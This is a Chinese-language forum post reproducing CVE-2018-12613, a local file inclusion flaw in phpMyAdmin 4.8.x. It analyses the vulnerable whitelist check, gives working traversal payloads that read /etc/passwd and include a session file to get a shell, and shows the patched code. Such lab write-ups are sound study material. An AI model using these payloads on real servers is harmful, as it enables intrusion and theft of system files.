• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

CVE-2018-12613phpmyadmin本地文件包含复现


This Wind

Recommended Posts

最近看到某文章提到了,最近在学代码审计顺便看看
漏洞影响

  • 4.8.0
  • 4.8.0.1
  • 4.8.1

环境

phpmyadmin 4.8.1
这里直接用的靶场https://store.vsplate.com/

代码刨析

问题出现在index.php第61行
(index.php 55行~63行)

if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target']; //问题出现在这
    exit;
}

这段代码的内容为:

  • $_REQUEST[‘target’]参数为字符串类型
  • $_REQUEST[‘target’]参数不存在index关键字
  • $_REQUEST[‘target’]参数不存在黑名单$target_blacklist
  • checkPageValidity函数返回True

checkPageValidity函数代码
(Core.php 443~476行)

public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist; //白名单
    }
    if (! isset($page) || !is_string($page)) { //$page参数不存在,不是string类型
        return false;
    }


    if (in_array($page, $whitelist)) { //$page参数在白名单里 (无法利用,没对$page参数做任何取值判断)
        return true;
    }


    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    ); //取第一个字符到?号前一个位置的内容
    if (in_array($_page, $whitelist)) { //$page里面的参数是否在白名单内 (无法利用,$page参数带?就会被php认为php里的参数)
        return true;
    }


    $_page = urldecode($page); //url解码
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    ); //取第一个字符到?号前一个位置的内容
    if (in_array($_page, $whitelist)) { //url解码后判断$page里面的参数是否在白名单内 (可以利用,因为url编码绕过了上面所描述的问题)
        return true;
    }


    return false;
}

白名单

public static $goto_whitelist = array(
    'db_datadict.php',
    'db_sql.php',
    'db_events.php',
    'db_export.php',
    'db_importdocsql.php',
    'db_multi_table_query.php',
    'db_structure.php',
    'db_import.php',
    'db_operations.php',
    'db_search.php',
    'db_routines.php',
    'export.php',
    'import.php',
    'index.php',
    'pdf_pages.php',
    'pdf_schema.php',
    'server_binlog.php',
    'server_collations.php',
    'server_databases.php',
    'server_engines.php',
    'server_export.php',
    'server_import.php',
    'server_privileges.php',
    'server_sql.php',
    'server_status.php',
    'server_status_advisor.php',
    'server_status_monitor.php',
    'server_status_queries.php',
    'server_status_variables.php',
    'server_variables.php',
    'sql.php',
    'tbl_addfield.php',
    'tbl_change.php',
    'tbl_create.php',
    'tbl_import.php',
    'tbl_indexes.php',
    'tbl_sql.php',
    'tbl_export.php',
    'tbl_operations.php',
    'tbl_structure.php',
    'tbl_relation.php',
    'tbl_replace.php',
    'tbl_row_action.php',
    'tbl_select.php',
    'tbl_zoom_select.php',
    'transformation_overview.php',
    'transformation_wrapper.php',
    'user_password.php',
);

利用的payload

/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd当解析到/../../../../../../../../etc/passwd会进行包含,实现利用

验证是否存在包含

/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

UojReJ.png

利用session文件getshell (方法有很多)
(在cookie找到phpmyadmin参数)

/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_01876fad4b7e3596a65aa96048b99def #有些是/tmp路径有些是别的路径被这个坑的老惨了

UojIW6.png

新版phpmyadmin修复代码

if (isset($GLOBALS['target']) && is_string($GLOBALS['target']) && !empty($GLOBALS['target']) && in_array($GLOBALS['target'], $goto_whitelist)) {
    $main_target = $GLOBALS['target'];
}

参考链接:https://blog.csdn.net/qq_34444097/article/details/85264686

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now